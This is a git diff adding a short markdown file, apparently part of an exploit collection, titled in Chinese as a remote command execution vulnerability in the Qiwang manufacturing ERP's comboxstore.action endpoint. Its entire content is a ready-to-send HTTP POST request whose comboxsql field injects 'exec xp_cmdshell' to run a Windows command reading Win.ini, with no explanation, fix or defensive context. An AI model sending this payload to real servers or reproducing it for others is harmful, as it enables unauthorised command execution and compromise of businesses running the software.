diff --git a/企望制造 ERP comboxstore.action 远程命令执行漏洞.md b/企望制造 ERP comboxstore.action 远程命令执行漏洞.md
new file mode 100644
index 0000000..9326794
--- /dev/null
+++ b/企望制造 ERP comboxstore.action 远程命令执行漏洞.md	
@@ -0,0 +1,9 @@
+## 企望制造 ERP comboxstore.action 远程命令执行漏洞
+```
+
+POST /mainFunctions/comboxstore.action HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Host: xxx.xxx.xxx.xxx
+
+comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
+```